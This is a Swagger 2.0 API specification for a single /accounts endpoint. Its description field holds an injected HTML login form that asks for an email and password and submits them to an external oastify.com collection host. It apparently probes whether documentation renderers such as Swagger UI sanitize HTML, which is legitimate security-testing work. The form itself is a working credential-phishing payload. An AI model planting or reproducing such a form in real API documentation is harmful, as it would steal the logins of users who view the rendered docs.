swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
    <form action="https://ssolvzl7sc83r2tx167ld7j56wcv0toi.oastify.com">Login for security:<br><label for="u">Email:<input type="text" id="u" name="u"><br><label for="p">Pass:<input type="password" id="p" name="p"><br><input type="submit" value="ok">
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
